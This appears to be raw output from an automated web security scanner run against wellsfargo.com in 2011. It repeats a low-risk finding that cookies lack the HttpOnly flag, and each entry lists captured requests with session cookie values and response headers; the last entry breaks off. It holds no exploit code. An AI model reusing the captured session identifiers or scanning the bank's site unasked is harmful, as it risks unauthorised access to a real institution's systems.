HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:00:54 GMT Content-length: 0 Content-type: text/html Set-Cookie: v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com Location: https://www.wellsfargo.com/
The following cookie was issued by the application and does not have the HttpOnly flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Clickthrough&RequestType=Click&COID= HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 404 Not found Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:03 GMT Content-length: 3018 Content-type: text/html; charset=ISO-8859-1 Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /about/diversity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 8581 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>About Wells Fargo - Diversity ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-length: 11460 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 301 Moved Permanently Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:49 GMT Content-length: 15 Content-type: text/html; charset=ISO-8859-1 X-Cnection: close Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010 Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /browser/jaws_setting HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-length: 3286 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /careers/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:00 GMT Content-length: 7617 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /checking/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /com/comintro HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:25 GMT Location: https://www.wellsfargo.com/com/ Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/com/">h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit_cards/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit_cards/select_card HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Location: https://www.wellsfargo.com/credit_cards/ Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/credit_ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /equity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /equity/rate_payments/information/rate_calc HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Location: https://www.wellsfargo.com/equity/tools/rate_calc Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/equity/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:21 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service f ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/faqs/signon_faqs HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:22 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/services HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:23 GMT Content-length: 11416 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /insurance/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:54 GMT Content-length: 8678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /insurance/id_credit_protection/idtheft HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Identity Theft Protection - Id ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/hsa/enroll HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 9955 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Health Savings Acc ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/investmentservices/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 8732 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/more HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:51 GMT Content-length: 12093 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/mutual_funds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 12036 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Mutual Fund Center ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/retirement/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 9837 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/retirement/openira/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open an IRA (Individual Retire ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/about/fdic HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:08 GMT Content-length: 9678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/applications/inprogress HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
